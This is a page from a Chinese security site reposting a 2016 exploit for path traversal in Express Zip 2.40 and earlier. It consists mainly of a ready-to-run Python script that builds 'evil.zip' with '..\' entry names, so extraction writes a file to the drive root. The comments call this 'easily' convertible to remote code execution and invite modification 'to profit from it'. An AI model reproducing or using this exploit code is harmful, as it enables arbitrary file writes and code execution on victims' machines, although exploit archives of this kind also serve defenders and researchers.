Express Zip 2.40 - Path Traversal Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Express Zip 2.40 - Path Traversal Exploit

来源：vfocus.net 作者：R-73eN 发布时间：2016-04-12

#!/usr/bin/python -w

# Title : Express Zip <= 2.40 Path Traversal

# Date : 07/04/2016

# Author : R-73eN

# Tested on : Windows Xp / Windows 7 Ultimate

# Software Link : http://www.nchsoftware.com/zip/

# Download Link: http://www.nchsoftware.com/zip/zipplus.exe

# Vulnerable Versions : Express Zip <= 2.40

# Express Zip doesn't validates " ..\ " which makes possible

# to do a path traversal attack which can be converted easily to RCE

# How to Reproduce:

# 1- Run Exploit

# 2- Right Click evil.zip go to Express Zip and click Extract Here

# 3- File will be extracted to the root of the partition in this case C:\POC.txt

# This quick and dirt code is written only for demonstration purposes.

# If you wanna profit from it you must modify it.

# Video: https://www.youtube.com/watch?v=kb43h8Hoo0o

#

#Banner

banner = ""

banner += " ___ __ ____ _ _ \n"

banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"

banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"

banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"

banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"

print banner

import zipfile, sys

if(len(sys.argv) != 2):

print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"

print "[+] Example: python exploit.py test.txt"

exit(0)

print "[+] Creating Zip File [+]"

zf = zipfile.ZipFile("evil.zip", "w")

zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\POC.txt")

zf.close()

print "[+] Created evil.zip successfully [+]"

[

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

推荐广告